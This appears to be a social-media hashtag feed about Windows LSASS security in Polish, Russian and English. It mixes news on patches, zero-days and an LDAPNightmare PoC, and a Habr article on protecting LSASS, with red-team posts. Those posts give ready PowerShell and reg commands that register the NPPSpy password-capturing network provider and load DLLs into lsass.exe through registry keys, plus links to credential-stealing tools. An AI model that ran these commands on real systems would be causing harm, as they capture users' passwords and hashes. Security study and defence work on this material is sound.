PressMind LabsJan 14

Microsoft stycznia 2026 – Krytyczne łatki, zero-day i pilne aktualizacje

Czy CVSS 5. 5 może być pilniejsze niż „krytyk”?

Czytaj dalej:
https://pressmind.org/microsoft-stycznia-2026-krytyczne-atki-zero-day-i-pilne-aktualizacje/

#PressMindLabs #cve202620805 #lsass #microsoft #patchtuesday #protectedview

HabrSep 21

Сдвиг парадигмы в безопасности серверов: как мы пережили Windows Server 2025 и сделали инфраструктуру крепче

Мы поймали странный «обрыв» доступа к нескольким NAS и старому принтер-серверу. В логе — ничего драматического: «не получилось договориться по безопасности». Виноват оказался не «прокси/файрвол», а новая норма безопасности : клиент Windows Server 2025 уже требует подпись SMB-пакетов . Всё, что не умеет — идёт мимо кассы. В тот же месяц у коллег «ложилась» интеграция, ретранслирующая NTLM на LDAP, — и снова не сеть виновата. LDAP-подпись и привязка канала (channel binding) перестали считать ретрансляцию чем-то приемлемым. Зато после шторма заметно стихло количество «подозрительных» попыток бокового смещения. Мораль простая: реактивная модель «ставим патчи и надеемся» больше не тянет . Нужен проактивный дизайн — с нормами безопасности, которые не нужно «включать по желанию», а которые уже встроены в дефолт .

https://habr.com/ru/articles/948976/

#windows_server_2025 #active_directory #SMB_signing #LDAP_signing #kerberos #ntlm #AD_CS #laps #credential_guard #lsass

Сдвиг парадигмы в безопасности серверов: как мы пережили Windows Server 2025 и сделали инфраструктуру крепче

Windows Server 2025 TL;DR:  Windows Server 2025 — это не «ещё один релиз», а разворот к  secure-by-default . Главные перемены: жёстче SMB (подписание по умолчанию на клиенте), отказ от...

Хабр
kriware Sep 20

Different ways to dump LSASS

Guide to dumping lsass: Task Manager, comsvcs MiniDump, procdump, MiniDumpWriteDump, handle steal, PssCaptureSnapshot, SilentProcessExit.

https://github.com/yo-yo-yo-jbo/dumping_lsass/

#LSASS

GitHub - yo-yo-yo-jbo/dumping_lsass: The different ways to dump lsass

The different ways to dump lsass. Contribute to yo-yo-yo-jbo/dumping_lsass development by creating an account on GitHub.

GitHub
HabrSep 4, 2025

Защита процесса lsass от credential dumping

Процесс lsass.exe (Local Security Authority Subsystem Service) — критически важный компонент ОС Windows. Он отвечает за аутентификацию пользователей и управление учетными данными. В его памяти хранятся хэши паролей NTLM, билеты Kerberos, данные сессий, а в некоторых конфигурациях — даже пароли в открытом виде, если используется устаревший протокол WDigest. Столь высокая концентрация секретов делает lsass.exe лакомой целью для злоумышленников, получивших доступ к системе. После Initial Access фазы атакующий будет стремиться повысить привилегии и двигаться дальше по сети. Дамп памяти lsass.exe — самый прямой и часто самый простой способ достичь этих целей, поскольку при отсутствии защиты атакующий очень легко извлекает оттуда данные для проведения атак Pass-the-hash и Pass-the-ticket. В то же время, для атаки на незащищенный lsass.exe, нужно сравнительно немного: права локального администратора и Mimikatz. Таким образом, защиту этого процесса, по моему мнению, нужно внести в базовый набор мероприятий для любой инфраструктуры с Windows-машинами. Существуют различные методы получения дампа lsass.exe. В материале мы рассмотрим как тривиальные, так и более изощренные, но не с позиции атакующего. Поскольку основная часть материала будет посвящена методам защиты lsass от извлечения данных, знакомство с различными способами атаки будет играть вспомогательную роль для лучшего понимания механики защитных мер.

https://habr.com/ru/companies/first/articles/943490/

#lsass #mimikatz #credentials

Защита процесса lsass от credential dumping

Процесс lsass.exe (Local Security Authority Subsystem Service) — критически важный компонент ОС Windows. Он отвечает за аутентификацию пользователей и управление учетными данными. В его памяти...

Хабр
Show threadWho Let The Dogs Out 🐾Aug 16, 2025

#red_team #lsass #hacking

Существуют также специфичные ключи реестра.

Первый — `LSASS Driver`. Это недокументированное значение реестра, в которое можно засунуть библиотеку и она будет загружена в процесс `lsass.exe`.

```ps1
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "c:\windows\system32\1.dll"
```

- https://github.com/oxfemale/LogonCredentialsSteal .

Также `LsaExtensionConfig`:

```reg
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LsaExtensionConfig\Interfaces\1002
```

- https://github.com/Maldev-Academy/LsassHijackingViaReg

Наконец, существует возможность злоупотребления службой `KeyISO` для подгрузки библиотеки в процесс lsass.exe, этот метод описывал itm4n в статье (https://itm4n.github.io/ghost-in-the-ppl-part-1/).

GitHub - oxfemale/LogonCredentialsSteal: LOCAL AND REMOTE HOOK msv1_0!SpAcceptCredentials from LSASS.exe and DUMP DOMAIN/LOGIN/PASSWORD IN CLEARTEXT to text file.

LOCAL AND REMOTE HOOK msv1_0!SpAcceptCredentials from LSASS.exe and DUMP DOMAIN/LOGIN/PASSWORD IN CLEARTEXT to text file. - oxfemale/LogonCredentialsSteal

GitHub
Show threadWho Let The Dogs Out 🐾Aug 16, 2025

#red_team #lsass #hacking

Диспетчер УД

```ps1
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue

New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll"
```

Подробнее:
- https://xakep.ru/2023/03/15/windows-password;
- https://habr.com/ru/articles/709128/ - проект по отслеживанию изменения пароля пользователей.

Поставщик небезопасности. Как Windows раскрывает пароль пользователя

Большинство механизмов защиты в Windows строится на паролях учетных записей пользователей. В сегодняшней статье мы разберем несколько способов перехвата паролей в момент авторизации пользователя и напишем код для автоматизации этого процесса.

Show threadWho Let The Dogs Out 🐾Aug 16, 2025

#red_team #lsass #hacking

- https://github.com/mdsecactivebreach/DragonCastle - загрузка через RPC + python-обвязка для использования с Kali Linux.

Помимо `Security Packages`, вы можете грузить `Authentication Packages`, `Notification Packages` и компоненты диспетчера учётных данных. Последний способ уже не работает на современных системах. Также не существует отдельного API-вызова , требуется править реестр и перезагружать систему.

Затронуты следующие ключи реестра:

`Authentication Packages`

```cmd
reg add hklm\system\currentcontrolset\control\lsa\ /v "Authentication Packages" /d "msv1_0"\0"fulllegit" /t REG_MULTI_SZ
```

`Notification Packages`

```cmd
reg add "hklm\system\currentcontrolset\control\lsa" /v "notification packages" /d scecli\0evilpwfilter /t reg_multi_sz
```

GitHub - mdsecactivebreach/DragonCastle: A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process. - mdsecactivebreach/DragonCastle

GitHub
Who Let The Dogs Out 🐾Aug 16, 2025

Как внедряться в lsass.exe

#red_team #lsass #hacking

Стандартные методы внедрения DLL: `SideLoading`, `Search Order Hijacking` и т.п.

Рассмотрим методы внедрения DLL характерные для `lsass.exe`.

`Custom SSP`. Техника позволяет загрузить собственный `Security Package` в адресное пространство процесса `lsass.exe`. Плюс - в возможности загрузки библиотеки без перезагрузки целевого устройства через вызов `AddSecurityPackage()` (https://learn.microsoft.com/en-us/windows/win32/api/sspi/nf-sspi-addsecuritypackagea).

Код и подробный разбор:
- https://blog.xpnsec.com/exploring-mimikatz-part-2/ - анализ `Security Packages`;
- https://xakep.ru/2023/03/15/windows-password/ - подробный разбор механизма аутентификации в Windows;
- https://snovvcra.sh/2024/05/19/from-dll-side-load-to-malicious-ssp.html - кейс с загрузкой вредоносного `SSP`;
- https://github.com/jas502n/mimikat_ssp - загрузка через метод `SspirCallRpc()`;

AddSecurityPackageA function (sspi.h) - Win32 apps

Adds a security support provider to the list of providers supported by Microsoft Negotiate. (ANSI)

 Apr 9, 2025

#Windows #UnderAttack: #0day #vulnerability used by #ransomware group

https://www.ghacks.net/2025/04/09/windows-under-attack-0-day-vulnerability-used-by-ransomware-group/?utm_source=mas.to&utm_medium=social&utm_campaign=&utm_term=&utm_content=&utm_referrer=https%3A%2F%2Fmas.to%2F%40KNTRO&utm_id=&utm_creative=&utm_channel=mastodon_organic&utm_platform=desktop&utm_location=argentina&utm_language=es-ar&utm_variant=

#0DayVulnerability #ZeroDay #ZeroDayVulnerability #Windows10 #Windows11 #WindowsServer #WindowsServer2025 #CVE202529824 #CVE_2025_29824 #CommonLogFileSystem #CLFS #Storm2460 #Storm_2460 #RansomEXX #MSBuild #PipeMagic #LSASS #LSASSMemory

Windows under attack: 0-day vulnerability used by ransomware group - gHacks Tech News

Microsoft confirmed limited targeted attacks against a 0-day vulnerability. A patch is available, but not for all Windows systems at the time.

gHacks Technology News
Rene RobichaudJan 3, 2025

LDAPNightmare PoC Exploit Crashes LSASS and Reboots Windows Domain Controllers
https://thehackernews.com/2025/01/ldapnightmare-poc-exploit-crashes-lsass.html

#Infosec #Security #Cybersecurity #CeptBiro #LDAPNightmare #PoCExploit #LSASS #WindowsDomainControllers

LDAPNightmare PoC Exploit Crashes LSASS and Reboots Windows Domain Controllers

LDAPNightmare PoC exploit crashes Windows Servers via CVE-2024-49113. Patch or monitor CLDAP responses to prevent DoS.

The Hacker News